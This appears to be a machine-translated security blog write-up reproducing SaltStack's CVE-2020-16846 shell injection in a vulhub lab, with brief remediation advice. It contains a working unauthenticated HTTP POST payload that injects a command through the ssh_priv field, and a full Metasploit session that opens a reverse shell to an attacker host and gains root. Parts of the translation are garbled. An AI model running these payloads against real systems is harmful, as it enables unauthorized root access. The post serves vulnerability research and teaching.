SaltStack Shell Injection (CVE-2020-16846) vulnerability reappears


I. Introduction of vulnerabilities

SaltStack is a distributed operation and maintenance system widely used in Internet scenarios. It has the following two main functions:

• Configure a management system that can maintain remote nodes in a predefined state

• Distributed remote execution system for executing commands and querying data on remote nodes, individually or by arbitrary selection of criteria

The combination of CVE-2020-16846 and CVE-2020-25592 can execute any command through the SALt-API interface without authorization. Cve-2020-25592 allows any user to invoke the SSH module, and CVE-2020-16846 allows users to run any command. Salt-api is not enabled by default, but the vast majority of SaltStack users choose to enable salt-API, so there is a high risk.

Second, environment building

Download environment:

https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846
Copy the code

Or background reply: CVE-2020-16846 download environment

Environment startup: docker-compose up -d

Access the address: https://192.168.1.107:8000/

Third, vulnerability recurrence

POC

POST /run HTTP/1.1 Host: 192.168.1.107:8000 User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; Rv :68.0) Gecko/20100101 Firefox/68.0 Accept: Application/X-YAML Accept: en-us,en; Q =0.5 accept-encoding: gzip, deflate DNT: 1 Connection: close upgrade-insecure -Requests: 1 Content-type: application/x-www-form-urlencoded Content-Length: 91 token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3bCopy the code

Perform poc

Touch file successful

MSF has exp in it

exploit/linux/http/saltstack_salt_api_cmd_exec

use exploit/linux/http/saltstack_salt_api_cmd_exec msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rhosts 192.168.1.107 rhosts => 192.168.1.107 MSf6 exploit(Linux/HTTP/saltstack_salt_API_cmd_exec) > set rport 8000 rport => 8000 MSf6 exploit(Linux/HTTP/saltstack_salt_API_cmd_exec) > set LhOST 192.168.1.117 LhOST => 192.168.1.117 MSf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set LPORT 4444 LPORT => 4444 msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > show options Module options (exploit/linux/http/saltstack_salt_api_cmd_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.1.107 Yes The target host(s), range CIDR identifier, Or hosts file with syntax 'file:' RPORT 8000 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network Interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080  yes The local port to listen on. SSL true no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL  certificate (default is randomly generated) TARGETURI / yes Base path URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_python_ssl): Name The Current Setting of Required Description -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- LHOST 192.168.1.117 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Unix Command msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > exploit [*] Started reverse SSL Handler on 192.168.1.117:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. Auth bypass successful. [*] Executing Unix Command for cmd/unix/reverse_python_ssl [*] Command shell session 2 Opened (192.168.1.117:4444 -> 192.168.1.107:50332) at 2020-12-21 22:34:40 +0800 ID UID =0(root) GID =0(root) groups=0(root)Copy the code

4. Vulnerability repair

1. Fix it as soon as possible. Since the official upgrade package has not been released, you still need to manually repair it. Here is the official security notice and repair patch.

2. If you do not have to use salt-API, disable this feature.

Reference Documents:

www.anquanke.com/vul/id/2222…

Github.com/vulhub/vulh…

www.secpulse.com/archives/14…

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq\_3760279…

Personal blog garden: www.cnblogs.com/thelostworl…

FREEBUF homepage: www.freebuf.com/author/thel…